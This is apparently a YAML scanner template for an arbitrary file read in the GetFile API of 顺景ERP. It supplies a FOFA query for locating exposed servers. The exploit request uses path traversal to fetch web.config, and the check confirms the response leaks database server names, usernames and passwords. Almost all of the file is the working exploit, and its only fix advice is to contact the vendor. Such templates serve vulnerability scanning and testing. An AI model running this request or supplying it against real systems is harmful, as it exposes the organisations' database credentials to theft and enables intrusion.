product: 顺景ERP
vName: 顺景ERP GetFile接口任意文件读取
type: 文件读取
vID: [ ]
level: 2
vDesc: 顺景ERP GetFile接口存在任意文件读取漏洞
version: ''
note: ''
search:
  FOFA: body="/api/DBRecord/getDBRecords"
protocol: http
link: https://mp.weixin.qq.com/s/iXGsrODgsjcyZTIkmTQTXQ
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: '/api/Download/GetFile?FileName=../web.config&Title=123'
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - WebServerName
              - WebDBUserName
              - WebDBPassword
            logic: 'and'